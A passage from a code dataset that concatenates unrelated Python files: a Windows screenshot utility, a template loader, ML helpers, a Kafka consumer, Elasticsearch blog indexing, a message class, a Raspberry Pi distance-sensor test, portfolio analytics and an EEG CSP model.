List.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520338237","text":"import logging\nimport win32gui\nimport win32ui\nimport win32con\nimport win32api\nimport datetime\nimport re\nfrom PIL import Image, ImageDraw\n\nmodule_logger = logging.getLogger('application.CaptureScreen')\n\n\ndef get_current_time_date_to_string():\n s_string = str(datetime.datetime.now())\n s_string = re.sub(\":\", \"\", s_string)\n return s_string\n\n\nclass CaptureScreen(object):\n\n def __init__(self):\n self.logger = logging.getLogger('application.CaptureScreen')\n self.logger.debug('creating an instance of CaptureScreen')\n self.width = 0\n self.height = 0\n self.src_up_left_x = 0\n self.src_up_left_y = 0\n self.file_name = \"\"\n self.width_offset = 0\n self.height_offset = 0\n self.x_draw = 0\n self.y_draw = 0\n self.h_desktop = None\n self.desktop_dc = None\n self.img_dc = None\n self.mem_dc = None\n self.screen = None\n self.rgba_image = None\n self.image = None\n self.ellipse_image = None\n self.out = None\n # radius of the circle for the mouse position\n self.radius = 10\n\n def set_capture_params(self, width, height, width_offset, height_offset):\n\n self.file_name = get_current_time_date_to_string() + \".png\"\n self.width = width\n self.height = height\n self.width_offset = width_offset\n self.height_offset = height_offset\n self.logger.debug('Setting Capture Params %s %s and offset %s %s ',\n self.width,\n self.height,\n self.width_offset,\n self.height_offset)\n\n def set_cursor_draw(self, x_poz, y_poz):\n # x position on the screenShoot\n # ex:(x=80) = global mouse cursor pos(2000) - offset from the previous monitor(1920) from the left side.\n self.x_draw = x_poz - self.width_offset\n self.y_draw = y_poz - self.height_offset\n\n # this function gets only visible monitors (not virtual)\n def get_visible_monitors(self, ):\n i = 0\n try:\n i = win32api.GetSystemMetrics(win32con.SM_CMONITORS)\n except Exception as ex:\n self.logger.DEBUG('eception: %s', ex.message)\n return i\n\n # this function gets displayDeviceName \n def enum_display_devices(self):\n i = 0\n while True:\n try:\n device = win32api.EnumDisplayDevices(None, i)\n self.logger.DEBUG('Count [%d] Device: %s DeviceName(%s) ', i, device.DeviceString, device.DeviceName)\n i += 1\n except Exception as ex:\n self.logger.info('exception: %s', ex.message)\n break\n return i\n\n def grab_handle(self):\n self.h_desktop = win32gui.GetDesktopWindow()\n return True\n\n def create_context(self):\n # A device context is a structure that defines a set of graphic objects and their associated attributes\n self.desktop_dc = win32gui.GetWindowDC(self.h_desktop)\n # return value is a handle to a device context for the specified window.\n self.img_dc = win32ui.CreateDCFromHandle(self.desktop_dc)\n\n def create_memory(self):\n # CreateCompatibleDC function creates a memory device context (DC) compatible with the specified device.\n # return value is the handle to a memory DC.\n self.mem_dc = self.img_dc.CreateCompatibleDC()\n\n def create_bitmap(self):\n self.screen = win32ui.CreateBitmap()\n self.screen.CreateCompatibleBitmap(self.img_dc, self.width, self.height)\n # self.screen.CreateCompatibleBitmap(self.img_dc, 640,480)\n self.mem_dc.SelectObject(self.screen)\n\n def copy_screen_to_memory(self, ):\n self.mem_dc.BitBlt(\n (0, 0),\n (self.width, self.height),\n self.img_dc,\n (self.width_offset,\n self.height_offset),\n win32con.SRCCOPY)\n\n # self.mem_dc.StretchBlt( (0, 0), (640,480), self.img_dc, (self.widthOffset, self.hightOffset),\n # (self.width,self.height), win32con.SRCCOPY)\n\n bmp_info = self.screen.GetInfo()\n bmp_int = self.screen.GetBitmapBits(True)\n\n self.image = Image.frombuffer(\n 'RGB',\n (bmp_info['bmWidth'], bmp_info['bmHeight']),\n bmp_int, 'raw', 'BGRX', 0, 1)\n # convert BGRX to RGBA\n self.rgba_image = self.image.convert('RGBA')\n\n # create new Image RGBA\n self.ellipse_image = Image.new('RGBA', self.image.size, (255, 255, 255, 0))\n\n # draw ellipse there\n d = ImageDraw.Draw(self.ellipse_image)\n d.ellipse((self.x_draw - self.radius,\n self.y_draw - self.radius,\n self.x_draw + self.radius,\n self.y_draw + self.radius),\n fill=(255, 0, 0, 128))\n\n # blend alpha screen shot with cursor point\n self.out = Image.alpha_composite(self.rgba_image, self.ellipse_image)\n\n return True\n\n def save_bitmap_to_file(self, ):\n # self.path = os.getcwd()\n # self.screen.SaveBitmapFile(self.mem_dc, \"D:\\\\Capture\\\\\"+ str(self.fileName))\n self.out.save(str(self.file_name), 'PNG')\n\n def free_objects(self):\n self.mem_dc.DeleteDC()\n win32gui.DeleteObject(self.screen.GetHandle())\n self.image.close()\n self.rgba_image.close()\n self.ellipse_image.close()\n","sub_path":"src/CaptureScreen.py","file_name":"CaptureScreen.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513774330","text":"import os\n\ndef get_template_path(path):\n file_path = os.path.join(os.getcwd(), path)\n if not os.path.exists(file_path):\n raise Exception(\"This is not valid path: \" + file_path)\n return file_path\n\ndef get_template(path):\n file_path = get_template_path(path)\n return open(file_path).read()\n\ndef render_template(template_string, data):\n return template_string.format(**data)\n\ndef test():\n file = 'newsletter-template.html'\n data = {\n \"welcome_message\" : \"Welcome!\",\n \"site_address\" : \"www.google.com\",\n \"name\" : \"Joao das Couves\",\n \"company\" : \"Arvere Inc\",\n \"email\" : \"zeh_das_couves@gmail.com\",\n \"reply_adress\" : \"arvers.inc@gmail.com\"\n }\n template_text = get_template(file)\n print(render_template(template_text, data))\n\n#test()","sub_path":"Python/email/template_loader.py","file_name":"template_loader.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66124869","text":"import os\nimport time\nimport json\nimport numpy as np\n\nimport torch.nn as nn\n\nfrom numpy.random import uniform, normal, randint, choice\n\n\ndef save_results(r):\n date = time.strftime(\"%Y%m%d_%H%M%S\")\n filename = date + '_results.json'\n param_path = os.path.join('./results/', filename)\n with open(param_path, 'w') as fp:\n json.dump(r, fp, indent=4, sort_keys=True)\n\n\ndef find_key(params, partial_key):\n return next(v for k, v in params.items() if partial_key in k)\n\n\ndef sample_from(space):\n \"\"\"\n Sample a hyperparameter value from a distribution\n defined and parametrized in the list `space`.\n \"\"\"\n distrs = {\n 'choice': choice,\n 'randint': randint,\n 'uniform': uniform,\n 'normal': normal,\n }\n s = space[0]\n\n np.random.seed(int(time.time() + np.random.randint(0, 300)))\n\n log = s.startswith('log_')\n s = s[len('log_'):] if log else s\n\n quantized = s.startswith('q')\n s = s[1:] if quantized else s\n\n distr = distrs[s]\n if s == 'choice':\n return distr(space[1])\n samp = distr(space[1], space[2])\n if log:\n samp = np.exp(samp)\n if quantized:\n samp = round((samp / space[3]) * space[3])\n return samp\n\n\ndef str2act(a):\n if a == 'relu':\n return nn.ReLU()\n elif a == 'selu':\n return nn.SELU()\n elif a == 'elu':\n return nn.ELU()\n elif a == 'tanh':\n return nn.Tanh()\n elif a == 'sigmoid':\n return nn.Sigmoid()\n else:\n raise ValueError('[!] Unsupported activation.')\n\n\ndef prepare_dirs(dirs):\n for path in dirs:\n if not os.path.exists(path):\n os.makedirs(path)\n\n\nclass Reshape(nn.Module):\n def __init__(self, *args):\n super(Reshape, self).__init__()\n self.shape = args\n\n def forward(self, x):\n return x.view(self.shape, -1)\n\n\nclass AverageMeter(object):\n \"\"\"\n Computes and stores the average and\n current value.\n \"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"455524351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 5 19:45:14 2017\n\n@author: linhb\n\"\"\"\n# kafka-console-consumer.bat --zookeeper localhost:2181 --topic test\n# \nfrom kafka import KafkaConsumer \nconsumer = KafkaConsumer(bootstrap_servers='localhost:9092')\nconsumer.subscribe(['test'])\nfor message in consumer:\n print(message)","sub_path":"Tutorial_Python/kafka_consumer.py","file_name":"kafka_consumer.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96561051","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@version: ??\n@author: liangliangyy\n@license: MIT Licence \n@contact: liangliangyy@gmail.com\n@site: https://www.lylinux.net/\n@software: PyCharm\n@file: documents.py\n@time: 2019-04-05 13:05\n\"\"\"\nimport time\nfrom blog.models import Article, Category, Tag\nfrom elasticsearch_dsl import Document, Date, Integer, Keyword, Text, Object, Boolean\n\nfrom django.conf import settings\n\nELASTICSEARCH_ENABLED = hasattr(settings, 'ELASTICSEARCH_DSL')\n\nfrom elasticsearch_dsl.connections import connections\n\nif ELASTICSEARCH_ENABLED:\n connections.create_connection(hosts=[settings.ELASTICSEARCH_DSL['default']['hosts']])\n\n\nclass ElapsedTimeDocument(Document):\n url = Text()\n time_taken = Integer()\n log_datetime = Date()\n type = Text(analyzer='ik_max_word')\n useragent = Text()\n\n class Index:\n name = 'performance'\n settings = {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n\n class Meta:\n doc_type = 'ElapsedTime'\n\n\nclass ElaspedTimeDocumentManager():\n\n @staticmethod\n def create(url, time_taken, log_datetime, type, useragent):\n if not hasattr(ElaspedTimeDocumentManager, 'mapping_created'):\n ElapsedTimeDocument.init()\n setattr(ElaspedTimeDocumentManager, 'mapping_created', True)\n doc = ElapsedTimeDocument(meta={'id': int(round(time.time() * 1000))}, url=url, time_taken=time_taken,\n log_datetime=log_datetime, type=type, useragent=useragent)\n doc.save()\n\n\nclass ArticleDocument(Document):\n body = Text(analyzer='ik_max_word')\n title = Text(analyzer='ik_max_word')\n author = Object(properties={\n 'nickname': Text(analyzer='ik_max_word'),\n 'id': Integer()\n })\n category = Object(properties={\n 'name': Text(analyzer='ik_max_word'),\n 'id': Integer()\n })\n tags = Object(properties={\n 'name': Text(analyzer='ik_max_word'),\n 'id': Integer()\n })\n\n pub_time = Date()\n status = Text()\n comment_status = Text()\n type = Text()\n views = Integer()\n article_order = Integer()\n\n class Index:\n name = 'blog'\n settings = {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 0\n }\n\n class Meta:\n doc_type = 'Article'\n\n\nclass ArticleDocumentManager():\n\n def __init__(self):\n\n ArticleDocument.init()\n\n def create_index(self):\n ArticleDocument.init()\n\n def delete_index(self):\n from elasticsearch import Elasticsearch\n es = Elasticsearch()\n es.indices.delete(index='blog', ignore=[400, 404])\n\n def convert_to_doc(self, articles):\n return [ArticleDocument(meta={'id': article.id}, body=article.body, title=article.title,\n auth={\n 'nikename': article.author.username,\n 'id': article.author.id\n },\n category={\n 'name': article.category.name,\n 'id': article.category.id\n },\n tags=[{'name': t.name, 'id': t.id} for t in article.tags.all()],\n pub_time=article.pub_time,\n status=article.status,\n comment_status=article.comment_status,\n type=article.type,\n views=article.views,\n article_order=article.article_order\n ) for article in articles]\n\n def rebuild(self, articles=None):\n articles = articles if articles else Article.objects.all()\n docs = self.convert_to_doc(articles)\n for doc in docs:\n doc.save()\n\n def update_docs(self, docs):\n for doc in docs:\n doc.save()\n","sub_path":"apps/blog/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"114777995","text":"\"\"\"\n Module which contains the Message class heirarchy.\n\n CONCEPT:\n - Message classes represent the actual types of messages that are being\n transferred over the network by Iris\n - each Message class has two modes - binary and nonbinary\n - each Message class has two posses two methods that will enable the\n encoding and decoding from these two modes\n - Message classes have defined maximum sizes of messages\n\n FUTURE:\n - add persisting stuff - possibly as a mixing, messages have to be\n persisted for state-saving purposes\n - add id stuff - for identification of messages\n\"\"\"\n\nfrom iris.errors import (MessageInitError, MessageEncodingError,\n MessageDecodingError)\nfrom iris import utils\n\n\nclass BaseMessage:\n \"\"\" Base class of Message class hierarchy.\n\n Gives the overall skeleton which has to be inherited. \"\"\"\n\n NONBINARY = 0\n BINARY = 1\n\n\n @staticmethod\n def to_binary(message):\n raise NotImplementedError\n\n @staticmethod\n def from_binary(message):\n raise NotImplementedError\n\n def __init__(self, payload, host, port):\n if not utils.is_valid_address(host, port):\n raise MessageInitError(\"Invalid address %s:%s was provided\"\n % (str(host, str(port))))\n if not payload:\n raise MessageInitError(\"Cannot initialize without payload!\")\n if type(payload) == bytes:\n self._init_binary(payload, host, port)\n else:\n self._init_nonbinary(payload, host, port)\n\n def _init_binary(self, payload, host, port):\n raise NotImplementedError\n\n def _init_nonbinary(self, payload, host, port):\n raise NotImplementedError\n\n\nclass TextMessage:\n \"\"\" Base class of Message class sub-hierarchy that uses text payload.\n\n Contains basic text strings as payload, with static methods\n offering basic encoding and decoding of the payload \"\"\"\n\n PAYLOAD_SIZE_BINARY = 1500\n\n\n @staticmethod\n def to_binary(message):\n \"\"\" Responsible for encoding the message into BINARY mode, from\n NONBINARY, in order to get it ready for transmission.\n\n Can only be called with message in NONBINARY mode \"\"\"\n if message.mode == Message.NONBINARY:\n try:\n # TODO - add encoding as class parameter\n message.payload = message.payload.encode('UTF-8')\n except UnicodeEncodeError as e:\n raise MessageEncodingError(\"Failed to encode the payload: %s\"\n % message.payload) from e\n else:\n message.mode = Message.BINARY\n return message\n else:\n raise MessageEncodingError(\"Message must be in NONBINARY mode\")\n\n @staticmethod\n def from_binary(message):\n \"\"\" Responsible for decoding the message into NONBINARY mode, from\n BINARY, in order to get it ready for consumption by client.\n\n Can only be called with message in BINARY mode \"\"\"\n if message.mode == Message.BINARY:\n try:\n message.payload = message.payload.decode(\"UTF-8\")\n except UnicodeDecodeError as e:\n raise MessageDecodingError(\"Failed to decode the payload: %s\"\n % message.payload) from e\n else:\n message.mode = Message.NONBINARY\n return message\n else:\n raise MessageDecodingError(\"Message must be in BINARY mode\")\n\n def _init_binary(self, payload, host, port):\n self.payload = payload\n self.address = host, port\n self.mode = self.BINARY\n\n def _init_nonbinary(self, payload, host, port):\n if type(payload) == str:\n self.payload = payload\n self.address = host, port\n self.mode = self.NONBINARY\n else:\n raise MessageInitError(\"Nonbinary TextMessages must have payload\"\n \" of str type not: %s\" % str(type(payload)))\n","sub_path":"iris/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452385973","text":"# coding: utf-8\nimport time\nimport VL53L0X\nimport RPi.GPIO as GPIO\nimport sys\n# ROSノードの設定\n\n# GPIO for Sensor 1 shutdown pin\nsensor1_shutdown = 27\n# GPIO for Sensor 2 shutdown pin\nsensor2_shutdown = 17\n# GPIO for sensor 3 shutdown pin\nsensor3_shutdown = 22\nGPIO.setwarnings(False)\n\n# Setup GPIO for shutdown pins on each VL53L0X\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(sensor1_shutdown, GPIO.OUT)\nGPIO.setup(sensor2_shutdown, GPIO.OUT)\nGPIO.setup(sensor3_shutdown, GPIO.OUT)\n\n# Set all shutdown pins low to turn off each VL53L0X\nGPIO.output(sensor1_shutdown, GPIO.LOW)\nGPIO.output(sensor2_shutdown, GPIO.LOW)\nGPIO.output(sensor3_shutdown, GPIO.LOW)\n\n# Keep all low for 500 ms or so to make sure they reset\ntime.sleep(0.50)\n\n# Create one object per VL53L0X passing the address to give to\n# each.\ntof = VL53L0X.VL53L0X(address=0x2B)\ntof1 = VL53L0X.VL53L0X(address=0x2C)\ntof2 = VL53L0X.VL53L0X(address=0x2D)\n\n# Set shutdown pin high for the first VL53L0X then \n# call to start ranging \nGPIO.output(sensor1_shutdown, GPIO.HIGH)\ntime.sleep(0.50)\ntof.start_ranging(VL53L0X.VL53L0X_HIGH_SPEED_MODE)\n\n# Set shutdown pin high for the second VL53L0X then \n# call to start ranging \nGPIO.output(sensor2_shutdown, GPIO.HIGH)\ntime.sleep(0.50)\ntof1.start_ranging(VL53L0X.VL53L0X_HIGH_SPEED_MODE)\n\nGPIO.output(sensor3_shutdown, GPIO.HIGH)\ntime.sleep(0.50)\ntof2.start_ranging(VL53L0X.VL53L0X_HIGH_SPEED_MODE)\n\ntiming = tof.get_timing()\nif (timing < 20000):\n timing = 20000\nprint (\"Timing %d ms\" % (timing/1000))\n\nfor count in range(1, 101):\n print(\"normalized- %f\" % (tof2.normalized()))\ntof2.stop_ranging()\nGPIO.output(sensor3_shutdown, GPIO.LOW)\ntof1.stop_ranging()\nGPIO.output(sensor2_shutdown, GPIO.LOW)\ntof.stop_ranging()\nGPIO.output(sensor1_shutdown, GPIO.LOW)\n","sub_path":"2018/distancesensor/VL53L0X_rasp_python/python/VL53L0X_error_test.py","file_name":"VL53L0X_error_test.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94104635","text":"\"\"\"股票组合分析工具\"\"\"\nfrom FactorLib.data_source.base_data_source_h5 import data_source\nimport pandas as pd\nimport numpy as np\n\n\ndef format_benchmark(func):\n def wrapper(portfolio, benchmark, *args, **kwargs):\n assert isinstance(portfolio, (pd.Series, pd.DataFrame))\n if isinstance(portfolio, pd.Series):\n portfolio = portfolio.to_frame('portfolio_weight')\n if isinstance(benchmark, str):\n dates = portfolio.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_weight(ids=benchmark,\n dates=dates)\n portfolio, benchmark = portfolio.align(benchmark, axis='index', fill_value=0.0)\n return func(portfolio, benchmark, *args, **kwargs)\n return wrapper\n\n\n@format_benchmark\ndef cal_diversion(portfolio_weight, benchmark_weight):\n \"\"\"计算持仓权重与基准的偏离度\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark_weight: str or pd.DataFrame\n 基准权重\n \"\"\"\n diff = pd.DataFrame(data=np.abs(portfolio_weight.values-benchmark_weight.values),\n index=portfolio_weight.index,\n columns=['diversion'])\n return diff.groupby('date').sum()\n\n\n@format_benchmark\ndef cal_diversion_of_large_weight(portfolio_weight, benchmark_weight, n=10,\n base='portfolio'):\n \"\"\"计算前N大重仓股的权重偏离度\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark_weight: str or pd.DataFrame\n 基准权重\n\n n: int\n 取前N大重仓\n\n base: str\n 取值: portfolio or benchmark 以组合或者基准的重仓股为基准\n \"\"\"\n if base == 'portfolio':\n base_weight = portfolio_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n other_weight = benchmark_weight.reindex(base_weight.index)\n else:\n base_weight = benchmark_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n other_weight = portfolio_weight.reindex(base_weight.index)\n diff = pd.DataFrame(data=np.abs(base_weight.values - other_weight.values),\n index=base_weight.index,\n columns=['diversion'])\n return diff.groupby('date').sum()\n\n\ndef cal_total_weight_in_benchmark(portfolio_weight, benchmark):\n \"\"\"计算组合中属于基准成分股中的股票权重之和\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark: str or pd.DataFrame\n 基准名称\n \"\"\"\n if isinstance(benchmark, str):\n dates = portfolio_weight.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_members(ids=benchmark, dates=dates)\n portfolio_in_benchmark = portfolio_weight[portfolio_weight.index.isin(benchmark.index)]\n return portfolio_in_benchmark.groupby('date').sum()\n\n\ndef cal_total_num_in_benchmark(portfolio_weight, benchmark):\n \"\"\"计算组合中属于基准成分股中的股票数量\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark: str or pd.DataFrame\n 基准名称\n \"\"\"\n if isinstance(benchmark, str):\n dates = portfolio_weight.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_members(ids=benchmark, dates=dates)\n portfolio_in_benchmark = portfolio_weight[portfolio_weight.index.isin(benchmark.index)]\n return portfolio_in_benchmark.groupby('date').size()\n\n\ndef cal_ratio_in_benchmark(portfolio_weight, benchmark):\n \"\"\"计算组合中属于基准成分股中的股票数量比例\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n\n benchmark: str or pd.DataFrame\n 基准名称\n \"\"\"\n if isinstance(benchmark, str):\n dates = portfolio_weight.index.get_level_values('date').unique()\n benchmark = data_source.sector.get_index_members(ids=benchmark, dates=dates)\n portfolio_in_benchmark = portfolio_weight[portfolio_weight.index.isin(benchmark.index)]\n return portfolio_in_benchmark.groupby('date').size() / portfolio_weight.groupby('date').size()\n\n\n@format_benchmark\ndef compare_large_weight_with_benchmark(portfolio_weight, benchmark_weight, n=10, base='portfolio'):\n \"\"\"与基准比较权重股的权重\n\n Parameters:\n ------------------------\n portfolio_weight: pd.DataFrame or Series\n 持仓权重(index=[date, IDs], columns=weight)\n benchmark_weight: str or pd.DataFrame\n 基准权重\n n: int\n 取前N大重仓\n base: str\n 取值: portfolio or benchmark 以组合或者基准的重仓股为基准\n \"\"\"\n if base == 'portfolio':\n base_weight = portfolio_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = [base]\n other_weight = benchmark_weight.reindex(base_weight.index)\n other_weight.columns = ['benchmark']\n else:\n base_weight = benchmark_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = [base]\n other_weight = portfolio_weight.reindex(base_weight.index)\n other_weight.columns = ['portfolio']\n diff = base_weight.join(other_weight)[['portfolio', 'benchmark']]\n diff['Diff'] = diff.portfolio - diff.benchmark\n return diff\n\n\n@format_benchmark\ndef compare_total_weight_with_benchmark(portfolio_weight, benchmark_weight, n=10, base='portfolio'):\n \"\"\"与基准比较权重股总权重的差别\"\"\"\n if base == 'portfolio':\n base_weight = portfolio_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = [base]\n other_weight = benchmark_weight.reindex(base_weight.index)\n other_weight.columns = ['benchmark']\n else:\n base_weight = benchmark_weight.groupby('date', group_keys=False).apply(lambda x: x.nlargest(n, x.columns))\n base_weight.columns = [base]\n other_weight = portfolio_weight.reindex(base_weight.index)\n other_weight.columns = ['portfolio']\n diff = pd.concat([base_weight.groupby('date').sum(),\n other_weight.groupby('date').sum()], axis=1)[['portfolio', 'benchmark']]\n diff['Diff'] = diff.portfolio - diff.benchmark\n return diff\n\n\ndef cal_future_return(portfolio_weight, group=None, window_len='20d'):\n \"\"\"计算股票组合未来的收益率\n\n Parameters:\n -------------------------\n portfolio_weight: pd.DataFrame or Series\n 组合的权重\n group: pd.Series\n 可以用来给组合权重分组的分类器\n window_len: str\n 未来的时间窗口\n \"\"\"\n def cal_weighted_ret(x, y):\n return x.dot(y)\n\n future_ret = data_source.get_forward_ndays_return(None, idx=portfolio_weight, windows=[1], freq=window_len)[1]\n grouper = ['date']\n if group is not None:\n grouper.append(group)\n weight_name = portfolio_weight.columns[0]\n a = portfolio_weight.groupby(grouper, group_keys=False)[weight_name].agg(\n lambda x: cal_weighted_ret(x.values, future_ret.reindex(x.index).values))\n return a\n\n\nif __name__ == '__main__':\n from alphalens.utils import quantize_factor\n p = data_source.sector.get_index_weight('000300', dates=['20170228'])\n p.columns = ['a']\n group = quantize_factor(p.rename(columns=lambda x: 'factor'), quantiles=10).rename(index={'asset': 'IDs'})\n print(cal_future_return(p, group=group))\n","sub_path":"QuantLib/portfolio_analyse.py","file_name":"portfolio_analyse.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"441207513","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Meziane AITE, meziane.aite@inria.fr\nDescription:\nusage:\n reactions_to_SBML.py --padmetRef=FILE --reactions=FILE --output=FILE [-v]\n\noption:\n -h --help Show help.\n --padmetRef=FILE the padmet used as reference (ex: metacyc.padmet) \n --reactions=FILE file of reaction id. one by line.\n --output=FILE sbml output.\n -v print info\n\"\"\"\nfrom lib.sbmlGenerator import reactions_to_SBML\ntry:\n import docopt\nexcept ImportError:\n print(\"package docopt needed, use this cmd:\\n pip install \"\n + \"docopt\")\n exit()\n\n\ndef main():\n args = docopt.docopt(__doc__)\n padmetRef_file = args[\"--padmetRef\"]\n reactions_file = args[\"--reactions\"] \n output = args[\"--output\"]\n verbose = args[\"-v\"]\n\n reactions_to_SBML(reactions_file, output, padmetRef_file, verbose=verbose)\n \nif __name__ == \"__main__\":\n main()","sub_path":"aureme/reactions_to_SBML.py","file_name":"reactions_to_SBML.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"63431430","text":"Total = 0\r\nWinner = 0\r\n\r\nfor i in range(1,6):\r\n a, b, c, d = map(int,input().split())\r\n Tot = a + b + c + d\r\n if Tot > Total:\r\n Winner = i\r\n Total = Tot\r\nprint(Winner, Total)\r\n","sub_path":"Open/Python 3/pet.py","file_name":"pet.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"265927490","text":"import a3dc_module_interface as a3\nfrom modules.packages.a3dc.ImageClass import ImageClass\nfrom modules.a3dc_interface_utils import error\n \n\ndef module_main(ctx):\n \n try:\n a3.outputs['ChA Image']=ImageClass(a3.inputs['ChA Image'].image, a3.inputs['ChA Image'].metadata).to_multidimimage()\n a3.outputs['ChB Image']=ImageClass(a3.inputs['ChB Image'].image, a3.inputs['ChB Image'].metadata).to_multidimimage()\n a3.outputs['ChA Thresholded']=ImageClass(a3.inputs['ChA Thresholded'].image, a3.inputs['ChA Thresholded'].metadata).to_multidimimage()\n a3.outputs['ChB Thresholded']=ImageClass(a3.inputs['ChB Thresholded'].image, a3.inputs['ChB Thresholded'].metadata).to_multidimimage()\n\n\n except Exception as e:\n error(\"Error occured while executing '\"+str(ctx.type())+\"' module '\"+str(ctx.name())+\"' !\", exception=e)\n\n \ndef generate_config():\n\n #Set Outputs and inputs\n config=[a3.Input('ChA Image', a3.types.GeneralPyType), \n a3.Input('ChB Image', a3.types.GeneralPyType), \n a3.Input('ChA Thresholded', a3.types.GeneralPyType),\n a3.Input('ChB Thresholded', a3.types.GeneralPyType),\n a3.Output('ChA Image', a3.types.ImageFloat), \n a3.Output('ChB Image', a3.types.ImageFloat), \n a3.Output('ChA Thresholded', a3.types.ImageFloat),\n a3.Output('ChB Thresholded', a3.types.ImageFloat)] \n \n \n return config\n\na3.def_process_module(generate_config(), module_main)\n\n","sub_path":"src/app/modules/thresholding/module_Thresholding_Results.py","file_name":"module_Thresholding_Results.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40957877","text":"#!/usr/bin/env python3\n\n'''\nModel for Common Spatial Pattern (CSP) feature extraction and channel selection.\n'''\n\nimport os\nimport numpy as np\nimport time\n\n# import self defined functions\n# import get_data as get\nfrom filters import load_filterbank\nfrom csp import generate_projection,generate_eye,extract_feature\nfrom ranking import dimension_reduction, channel_selection_csprank, channel_selection_squared_sum\n\n__author__ = \"Michael Hersche, Tino Rellstab, Tianhong Gan\"\n__email__ = \"herschmi@ethz.ch, tinor@ethz.ch, tianhonggan@outlook.com\"\n\nresults_dir=f'results'\nos.makedirs(f'{results_dir}', exist_ok=True)\n\nclass CSP_Model:\n\tdef __init__(self):\n\t\tself.data_path \t= '/usr/scratch/xavier/herschmi/EEG_data/physionet/' #data path\n\t\tself.obtain_filter = True # need to reobtain filters\n\t\tself.run_channel_selection = True # need to select channels\n\t\tself.channel_selection_method = 1 # 1: w squared sum, 2: csp-rank\n\n\t\tself.fs = 160. # sampling frequency\n\t\tself.NO_channels = 64 # number of EEG channels\n\t\tself.NO_selected_channels = 8 # number of selected channels\n\t\tself.NO_subjects = 105 # number of subjects\n\t\tself.NO_csp = 12 # Total number of CSP features per band and timewindow\n\t\tself.NO_classes = 4\n\n\t\tself.bw = np.array([26]) # bandwidth of filtered signals\n\t\tself.ftype = 'butter' # 'fir', 'butter'\n\t\tself.forder= 2 # 4\n\t\tself.filter_bank = load_filterbank(self.bw,self.fs,order=self.forder,max_freq=30,ftype = self.ftype) # get filterbank coeffs\n\t\tself.NO_bands = self.filter_bank.shape[0]\n\n\t\ttime_windows_flt = np.array([\n\t\t\t\t\t\t\t\t\t[0,1],\n\t\t\t\t\t\t\t\t\t[0.5,1.5],\n\t\t\t\t\t\t\t\t\t[1,2],\n\t\t\t\t\t\t\t\t\t[1.5,2.5],\n\t\t\t\t\t\t\t\t\t[2,3],\n\t\t\t\t\t\t\t\t\t[0,2],\n\t\t\t\t\t\t\t\t\t[0.5,2.5],\n\t\t\t\t\t\t\t\t\t[1,3],\n\t\t\t\t\t\t\t\t\t[0,3]])*self.fs # time windows in [s] x fs for using as a feature\n\t\tself.time_windows = time_windows_flt.astype(int)\n\t\tself.time_windows = self.time_windows[8] # use only largest timewindow\n\t\tself.NO_time_windows = int(self.time_windows.size/2)\n\n\t\tself.NO_features = self.NO_csp*self.NO_bands*self.NO_time_windows\n\n\tdef load_data(self):\n\t\t#load data\n\t\tnpzfile = np.load(self.data_path+f'{self.NO_classes}class.npz')\n\t\tself.train_data, self.train_label = npzfile['X_Train'], 